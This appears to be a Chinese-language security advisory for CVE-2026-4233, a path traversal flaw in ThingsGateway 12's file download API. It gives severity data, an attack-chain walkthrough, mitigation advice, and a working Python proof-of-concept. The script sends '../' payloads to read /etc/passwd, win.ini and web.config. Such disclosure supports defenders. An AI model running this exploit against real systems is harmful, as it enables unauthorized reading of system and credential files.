CVE-2026-4233 ThingsGateway路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-4233

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ThingsGateway 12

漏洞概述

CVE-2026-4233是ThingsGateway 12版本中的一个路径遍历（Path Traversal）漏洞。该漏洞存在于/api/file/download接口中，攻击者可以通过构造恶意的fileName参数，利用../或其他目录遍历字符访问服务器上的任意文件。成功利用此漏洞可导致敏感信息泄露，包括配置文件、源代码、凭据文件等。由于该漏洞的利用复杂度较低且已有公开的漏洞利用代码，远程攻击者无需特殊权限即可发起攻击，对系统机密性造成威胁。建议相关用户及时关注厂商更新，采取临时防护措施防止攻击。

技术细节

该路径遍历漏洞发生在ThingsGateway 12的/api/file/download接口处。攻击者通过fileName参数注入目录遍历序列（如../），绕过应用程序的路径限制，访问服务器文件系统中的敏感文件。漏洞的根本原因在于应用程序未对用户输入的fileName参数进行充分的路径验证和安全过滤。攻击者通常利用此漏洞读取系统配置文件（如/etc/passwd、web.config等）、应用程序源代码、数据库连接字符串以及其他敏感凭证信息。由于该接口通常无需认证或仅需低权限认证即可访问，大大降低了攻击门槛。CVSS 3.1评分4.3（中等严重程度）主要反映了其对机密性的低影响。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统，确认其运行ThingsGateway 12版本

STEP 2

步骤2

攻击者访问/api/file/download接口，发现fileName参数存在路径遍历漏洞

STEP 3

步骤3

攻击者构造包含../的恶意fileName参数，如../../etc/passwd

STEP 4

步骤4

发送恶意请求，服务器未进行路径验证直接读取目标文件

STEP 5

步骤5

攻击者获取敏感文件内容，可能包括系统配置、凭据等信息

STEP 6

步骤6

利用获取的敏感信息进一步横向移动或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-4233 Path Traversal PoC
# Target: ThingsGateway 12
# Endpoint: /api/file/download
# Vulnerability: Path Traversal via fileName parameter

def exploit(target_url, filename):
    """
    Exploit path traversal vulnerability in ThingsGateway
    """
    # Try to read sensitive files
    payloads = [
        "../../windows/win.ini",
        "../../etc/passwd",
        "../../../../windows/system32/drivers/etc/hosts",
        "../../../web.config"
    ]
    
    for payload in payloads:
        try:
            params = {"fileName": payload}
            response = requests.get(
                f"{target_url}/api/file/download",
                params=params,
                timeout=10
            )
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Success with payload: {payload}")
                print(f"[+] Content:\n{response.text[:500]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-4233.py <target_url>")
        print("Example: python cve-2026-4233.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit(target, 'test')

影响范围

ThingsGateway 12

防御指南

临时缓解措施

在厂商发布修复版本之前，可采取以下临时缓解措施：1) 在Web应用层配置URL参数过滤规则，拒绝包含../、..\等路径遍历序列的请求；2) 限制/api/file/download接口的访问，仅允许受信任的IP地址访问；3) 对敏感文件设置严格的文件系统权限；4) 启用Web应用防火墙并配置路径遍历检测规则；5) 监控应用日志，及时发现异常的文件访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4233
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4233
3 Details https://www.cvedetails.com/cve/CVE-2026-4233/
4 VulDB https://vuldb.com/cve/CVE-2026-4233
5 Link https://github.com/SourByte05/SourByte-Lab/issues/11
6 Link https://vuldb.com/?ctiid.351156
7 Link https://vuldb.com/?id.351156
8 Link https://vuldb.com/?submit.771234